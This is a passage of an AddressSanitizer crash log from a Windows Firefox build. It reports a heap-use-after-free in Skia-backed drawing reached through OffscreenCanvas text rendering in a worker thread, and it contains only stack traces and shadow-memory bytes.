    #11 0x7ff9bc70f9d9 in mozilla::dom::CanvasRenderingContext2D::FillText /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:3860
    #12 0x7ff9baa76ed4 in mozilla::dom::OffscreenCanvasRenderingContext2D_Binding::fillText /builds/worker/workspace/obj-build/dom/bindings/OffscreenCanvasRenderingContext2DBinding.cpp:3904
    #13 0x7ff9bc53b092 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3318
    #14 0x7ff9c73ba9d3 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:553
    #15 0x7ff9c73a5ccc in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3368
    #16 0x7ff9c7391506 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:431
    #17 0x7ff9c73bab0d in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:585
    #18 0x7ff9c73bc9f1 in js::Call /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:652
    #19 0x7ff9c57cbe00 in JS::Call /builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp:117
    #20 0x7ff9bc09aacd in mozilla::dom::Function::Call /builds/worker/workspace/obj-build/dom/bindings/FunctionBinding.cpp:50
    #21 0x7ff9b9e3cc99 in mozilla::dom::Function::Call<nsCOMPtr<nsIGlobalObject> > /builds/worker/workspace/obj-build/dist/include/mozilla/dom/FunctionBinding.h:71
    #22 0x7ff9b9e3c609 in mozilla::dom::CallbackTimeoutHandler::Call /builds/worker/checkouts/gecko/dom/base/TimeoutHandler.cpp:167
    #23 0x7ff9bfb7886c in mozilla::dom::WorkerPrivate::RunExpiredTimeouts /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:5163
    #24 0x7ff9bfb864eb in mozilla::dom::WorkerRunnable::Run /builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp:377
    #25 0x7ff9b68bed58 in nsTimerImpl::Fire /builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp:654
    #26 0x7ff9b685ba48 in nsTimerEvent::Run /builds/worker/checkouts/gecko/xpcom/threads/TimerThread.cpp:469
    #27 0x7ff9bfb9bbe0 in mozilla::dom::`anonymous namespace'::ExternalRunnableWrapper::WorkerRun /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:201

previously allocated by thread T25 here:
    #0 0x7ff9d5fdeffc in malloc /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_win.cpp:98
    #1 0x7ffa21aa11ad in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52
    #2 0x7ff9b8938d99 in mozilla::gfx::DrawTargetSkia::CreateSourceSurfaceFromData /builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp:1558
    #3 0x7ff9b923c0f4 in gfxFontMissingGlyphs::DrawMissingGlyph /builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp:418
    #4 0x7ff9b91ce249 in gfxFont::DrawMissingGlyph /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:2202
    #5 0x7ff9b91d8338 in gfxFont::DrawGlyphs<0,0> /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:2030
    #6 0x7ff9b91d1e8d in gfxFont::Draw /builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp:2530
    #7 0x7ff9b9293f6a in gfxTextRun::Draw /builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp:683
    #8 0x7ff9bc86e121 in mozilla::dom::CanvasBidiProcessor::DrawText /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:4123
    #9 0x7ff9c11c9b54 in nsBidiPresUtils::ProcessSimpleRun /builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp:2387
    #10 0x7ff9c11c90ea in nsBidiPresUtils::ProcessText /builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp:2165
    #11 0x7ff9bc71197c in mozilla::dom::CanvasRenderingContext2D::DrawOrMeasureText /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:4448
    #12 0x7ff9bc70f9d9 in mozilla::dom::CanvasRenderingContext2D::FillText /builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp:3860
    #13 0x7ff9baa76ed4 in mozilla::dom::OffscreenCanvasRenderingContext2D_Binding::fillText /builds/worker/workspace/obj-build/dom/bindings/OffscreenCanvasRenderingContext2DBinding.cpp:3904
    #14 0x7ff9bc53b092 in mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions> /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3318
    #15 0x7ff9c73ba9d3 in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:553
    #16 0x7ff9c73a5ccc in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3368
    #17 0x7ff9c7391506 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:431
    #18 0x7ff9c73bab0d in js::InternalCallOrConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:585
    #19 0x7ff9c73bc9f1 in js::Call /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:652
    #20 0x7ff9c57cbe00 in JS::Call /builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp:117
    #21 0x7ff9bc09aacd in mozilla::dom::Function::Call /builds/worker/workspace/obj-build/dom/bindings/FunctionBinding.cpp:50
    #22 0x7ff9b9e3cc99 in mozilla::dom::Function::Call<nsCOMPtr<nsIGlobalObject> > /builds/worker/workspace/obj-build/dist/include/mozilla/dom/FunctionBinding.h:71
    #23 0x7ff9b9e3c609 in mozilla::dom::CallbackTimeoutHandler::Call /builds/worker/checkouts/gecko/dom/base/TimeoutHandler.cpp:167
    #24 0x7ff9bfb7886c in mozilla::dom::WorkerPrivate::RunExpiredTimeouts /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:5163
    #25 0x7ff9bfb864eb in mozilla::dom::WorkerRunnable::Run /builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp:377
    #26 0x7ff9b68bed58 in nsTimerImpl::Fire /builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp:654
    #27 0x7ff9b685ba48 in nsTimerEvent::Run /builds/worker/checkouts/gecko/xpcom/threads/TimerThread.cpp:469

Thread T26 created by T0 here:
    #0 0x7ff9d5febd62 in __asan_wrap_CreateThread /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_win.cpp:146
    #1 0x7ffa5c84838d in beginthreadex+0x5d (C:\WINDOWS\System32\ucrtbase.dll+0x18002838d)
    #2 0x7ff9d5beebde in _PR_MD_CREATE_THREAD /builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c:153
    #3 0x7ff9d5c1606e in _PR_NativeCreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1058
    #4 0x7ff9d5c167e8 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1184
    #5 0x7ff9d5c0c7ef in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1404
    #6 0x7ff9b68722ea in nsThread::Init /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:633
    #7 0x7ff9bfb98ff0 in mozilla::dom::WorkerThread::Create /builds/worker/checkouts/gecko/dom/workers/WorkerThread.cpp:102
    #8 0x7ff9bfafced8 in mozilla::dom::workerinternals::RuntimeService::ScheduleWorker /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:1324
    #9 0x7ff9bfafad52 in mozilla::dom::workerinternals::RuntimeService::RegisterWorker /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:1206
    #10 0x7ff9bfb5c22f in mozilla::dom::WorkerPrivate::Constructor /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:2652
    #11 0x7ff9bfb19624 in mozilla::dom::Worker::Constructor /builds/worker/checkouts/gecko/dom/workers/Worker.cpp:43
    #12 0x7ff9bb9ded46 in mozilla::dom::Worker_Binding::_constructor /builds/worker/workspace/obj-build/dom/bindings/WorkerBinding.cpp:1173
    #13 0x7ff9c73bdaa0 in InternalConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:700
    #14 0x7ff9c73a5c88 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3353
    #15 0x7ff9c7391506 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:431
    #16 0x7ff9c73bf07a in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:818
    #17 0x7ff9c73bf4b0 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:850
    #18 0x7ff9c57fd0fa in JS_ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:496
    #19 0x7ff9b9d0a167 in mozilla::dom::JSExecutionContext::ExecScript /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:241
    #20 0x7ff9c01a10e7 in mozilla::dom::ScriptLoader::EvaluateScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2403
    #21 0x7ff9c019f2f4 in mozilla::dom::ScriptLoader::EvaluateScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2207
    #22 0x7ff9c0195f15 in mozilla::dom::ScriptLoader::ProcessRequest /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1857
    #23 0x7ff9c0191440 in mozilla::dom::ScriptLoader::ProcessInlineScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1300
    #24 0x7ff9c017aec3 in mozilla::dom::ScriptLoader::ProcessScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:927
    #25 0x7ff9c0179e26 in mozilla::dom::ScriptElement::MaybeProcessScript /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:134
    #26 0x7ff9b87dd28d in nsHtml5TreeOpExecutor::RunScript /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:950
    #27 0x7ff9b87d7361 in nsHtml5TreeOpExecutor::RunFlushLoop /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:741
    #28 0x7ff9b87e4f90 in nsHtml5ExecutorFlusher::Run /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:174
    #29 0x7ff9b68217d6 in mozilla::SchedulerGroup::Runnable::Run /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:114
    #30 0x7ff9b6844c83 in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:553
    #31 0x7ff9b682d38c in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:867
    #32 0x7ff9b68297f2 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:698
    #33 0x7ff9b682a413 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:464
    #34 0x7ff9b68481c1 in mozilla::detail::RunnableFunction<`lambda at /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:188:7'>::Run /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:547
    #35 0x7ff9b687857a in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1239
    #36 0x7ff9b6887f5d in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:477
    #37 0x7ff9b7f30267 in mozilla::ipc::MessagePump::Run /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85
    #38 0x7ff9b7e47432 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374
    #39 0x7ff9b7e47207 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356
    #40 0x7ff9c06ec81c in nsBaseAppShell::Run /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:148
    #41 0x7ff9c08f779e in nsAppShell::Run /builds/worker/checkouts/gecko/widget/windows/nsAppShell.cpp:614
    #42 0x7ff9c5377ff7 in XRE_RunAppShell /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:738
    #43 0x7ff9b7e47432 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374
    #44 0x7ff9b7e47207 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356
    #45 0x7ff9c537753a in XRE_InitChildProcess /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:673
    #46 0x7ff7e1632c9e in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:353
    #47 0x7ff7e163166e in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:167
    #48 0x7ff7e1725a67 in __scrt_common_main_seh d:\agent\_work\2\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #49 0x7ffa5dc626bc in BaseThreadInitThunk+0x1c (C:\WINDOWS\System32\KERNEL32.DLL+0x1800126bc)
    #50 0x7ffa5ecca9f7 in RtlUserThreadStart+0x27 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x18005a9f7)

Thread T32 created by T0 here:
    #0 0x7ff9d5febd62 in __asan_wrap_CreateThread /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_win.cpp:146
    #1 0x7ffa5c84838d in beginthreadex+0x5d (C:\WINDOWS\System32\ucrtbase.dll+0x18002838d)
    #2 0x7ff9d5beebde in _PR_MD_CREATE_THREAD /builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c:153
    #3 0x7ff9d5c1606e in _PR_NativeCreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1058
    #4 0x7ff9d5c167e8 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1184
    #5 0x7ff9d5c0c7ef in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1404
    #6 0x7ff9b68722ea in nsThread::Init /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:633
    #7 0x7ff9bfb98ff0 in mozilla::dom::WorkerThread::Create /builds/worker/checkouts/gecko/dom/workers/WorkerThread.cpp:102
    #8 0x7ff9bfafced8 in mozilla::dom::workerinternals::RuntimeService::ScheduleWorker /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:1324
    #9 0x7ff9bfafad52 in mozilla::dom::workerinternals::RuntimeService::RegisterWorker /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:1206
    #10 0x7ff9bfb5c22f in mozilla::dom::WorkerPrivate::Constructor /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:2652
    #11 0x7ff9bfb19624 in mozilla::dom::Worker::Constructor /builds/worker/checkouts/gecko/dom/workers/Worker.cpp:43
    #12 0x7ff9bb9ded46 in mozilla::dom::Worker_Binding::_constructor /builds/worker/workspace/obj-build/dom/bindings/WorkerBinding.cpp:1173
    #13 0x7ff9c73bdaa0 in InternalConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:700
    #14 0x7ff9c73a5c88 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3353
    #15 0x7ff9c7391506 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:431
    #16 0x7ff9c73bf07a in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:818
    #17 0x7ff9c73bf4b0 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:850
    #18 0x7ff9c57fd0fa in JS_ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:496
    #19 0x7ff9b9d0a167 in mozilla::dom::JSExecutionContext::ExecScript /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:241
    #20 0x7ff9c01a10e7 in mozilla::dom::ScriptLoader::EvaluateScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2403
    #21 0x7ff9c019f2f4 in mozilla::dom::ScriptLoader::EvaluateScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2207
    #22 0x7ff9c0195f15 in mozilla::dom::ScriptLoader::ProcessRequest /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1857
    #23 0x7ff9c0191440 in mozilla::dom::ScriptLoader::ProcessInlineScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1300
    #24 0x7ff9c017aec3 in mozilla::dom::ScriptLoader::ProcessScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:927
    #25 0x7ff9c0179e26 in mozilla::dom::ScriptElement::MaybeProcessScript /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:134
    #26 0x7ff9b87dd28d in nsHtml5TreeOpExecutor::RunScript /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:950
    #27 0x7ff9b87d7361 in nsHtml5TreeOpExecutor::RunFlushLoop /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:741
    #28 0x7ff9b87e4f90 in nsHtml5ExecutorFlusher::Run /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:174
    #29 0x7ff9b68217d6 in mozilla::SchedulerGroup::Runnable::Run /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:114
    #30 0x7ff9b6844c83 in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:553
    #31 0x7ff9b682d38c in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:867
    #32 0x7ff9b68297f2 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:698
    #33 0x7ff9b682a413 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:464
    #34 0x7ff9b68481c1 in mozilla::detail::RunnableFunction<`lambda at /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:188:7'>::Run /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:547
    #35 0x7ff9b687857a in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1239
    #36 0x7ff9b6887f5d in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:477
    #37 0x7ff9b7f30267 in mozilla::ipc::MessagePump::Run /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85
    #38 0x7ff9b7e47432 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374
    #39 0x7ff9b7e47207 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356
    #40 0x7ff9c06ec81c in nsBaseAppShell::Run /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:148
    #41 0x7ff9c08f779e in nsAppShell::Run /builds/worker/checkouts/gecko/widget/windows/nsAppShell.cpp:614
    #42 0x7ff9c5377ff7 in XRE_RunAppShell /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:738
    #43 0x7ff9b7e47432 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374
    #44 0x7ff9b7e47207 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356
    #45 0x7ff9c537753a in XRE_InitChildProcess /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:673
    #46 0x7ff7e1632c9e in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:353
    #47 0x7ff7e163166e in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:167
    #48 0x7ff7e1725a67 in __scrt_common_main_seh d:\agent\_work\2\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #49 0x7ffa5dc626bc in BaseThreadInitThunk+0x1c (C:\WINDOWS\System32\KERNEL32.DLL+0x1800126bc)
    #50 0x7ffa5ecca9f7 in RtlUserThreadStart+0x27 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x18005a9f7)

Thread T25 created by T0 here:
    #0 0x7ff9d5febd62 in __asan_wrap_CreateThread /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_win.cpp:146
    #1 0x7ffa5c84838d in beginthreadex+0x5d (C:\WINDOWS\System32\ucrtbase.dll+0x18002838d)
    #2 0x7ff9d5beebde in _PR_MD_CREATE_THREAD /builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c:153
    #3 0x7ff9d5c1606e in _PR_NativeCreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1058
    #4 0x7ff9d5c167e8 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1184
    #5 0x7ff9d5c0c7ef in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1404
    #6 0x7ff9b68722ea in nsThread::Init /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:633
    #7 0x7ff9bfb98ff0 in mozilla::dom::WorkerThread::Create /builds/worker/checkouts/gecko/dom/workers/WorkerThread.cpp:102
    #8 0x7ff9bfafced8 in mozilla::dom::workerinternals::RuntimeService::ScheduleWorker /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:1324
    #9 0x7ff9bfafad52 in mozilla::dom::workerinternals::RuntimeService::RegisterWorker /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:1206
    #10 0x7ff9bfb5c22f in mozilla::dom::WorkerPrivate::Constructor /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:2652
    #11 0x7ff9bfb19624 in mozilla::dom::Worker::Constructor /builds/worker/checkouts/gecko/dom/workers/Worker.cpp:43
    #12 0x7ff9bb9ded46 in mozilla::dom::Worker_Binding::_constructor /builds/worker/workspace/obj-build/dom/bindings/WorkerBinding.cpp:1173
    #13 0x7ff9c73bdaa0 in InternalConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:700
    #14 0x7ff9c73a5c88 in Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3353
    #15 0x7ff9c7391506 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:431
    #16 0x7ff9c73bf07a in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:818
    #17 0x7ff9c73bf4b0 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:850
    #18 0x7ff9c57fd0fa in JS_ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:496
    #19 0x7ff9b9d0a167 in mozilla::dom::JSExecutionContext::ExecScript /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:241
    #20 0x7ff9c01a10e7 in mozilla::dom::ScriptLoader::EvaluateScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2403
    #21 0x7ff9c019f2f4 in mozilla::dom::ScriptLoader::EvaluateScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2207
    #22 0x7ff9c0195f15 in mozilla::dom::ScriptLoader::ProcessRequest /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1857
    #23 0x7ff9c0191440 in mozilla::dom::ScriptLoader::ProcessInlineScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1300
    #24 0x7ff9c017aec3 in mozilla::dom::ScriptLoader::ProcessScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:927
    #25 0x7ff9c0179e26 in mozilla::dom::ScriptElement::MaybeProcessScript /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:134
    #26 0x7ff9b87dd28d in nsHtml5TreeOpExecutor::RunScript /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:950
    #27 0x7ff9b87d7361 in nsHtml5TreeOpExecutor::RunFlushLoop /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:741
    #28 0x7ff9b87e4f90 in nsHtml5ExecutorFlusher::Run /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:174
    #29 0x7ff9b68217d6 in mozilla::SchedulerGroup::Runnable::Run /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:114
    #30 0x7ff9b6844c83 in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:553
    #31 0x7ff9b682d38c in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:867
    #32 0x7ff9b68297f2 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:698
    #33 0x7ff9b682a413 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:464
    #34 0x7ff9b68481c1 in mozilla::detail::RunnableFunction<`lambda at /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:188:7'>::Run /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:547
    #35 0x7ff9b687857a in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1239
    #36 0x7ff9b6887f5d in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:477
    #37 0x7ff9b7f30267 in mozilla::ipc::MessagePump::Run /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85
    #38 0x7ff9b7e47432 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374
    #39 0x7ff9b7e47207 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356
    #40 0x7ff9c06ec81c in nsBaseAppShell::Run /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:148
    #41 0x7ff9c08f779e in nsAppShell::Run /builds/worker/checkouts/gecko/widget/windows/nsAppShell.cpp:614
    #42 0x7ff9c5377ff7 in XRE_RunAppShell /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:738
    #43 0x7ff9b7e47432 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:374
    #44 0x7ff9b7e47207 in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:356
    #45 0x7ff9c537753a in XRE_InitChildProcess /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:673
    #46 0x7ff7e1632c9e in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:353
    #47 0x7ff7e163166e in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:167
    #48 0x7ff7e1725a67 in __scrt_common_main_seh d:\agent\_work\2\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #49 0x7ffa5dc626bc in BaseThreadInitThunk+0x1c (C:\WINDOWS\System32\KERNEL32.DLL+0x1800126bc)
    #50 0x7ffa5ecca9f7 in RtlUserThreadStart+0x27 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x18005a9f7)

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp:246 in mozilla::gfx::GetSkImageForSurface
Shadow bytes around the buggy address:
  0x04a6adbfd780: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x04a6adbfd790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x04a6adbfd7a0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x04a6adbfd7b0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x04a6adbfd7c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x04a6adbfd7d0: fa fa fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd
  0x04a6adbfd7e0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x04a6adbfd7f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x04a6adbfd800: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x04a6adbfd810: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x04a6adbfd820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
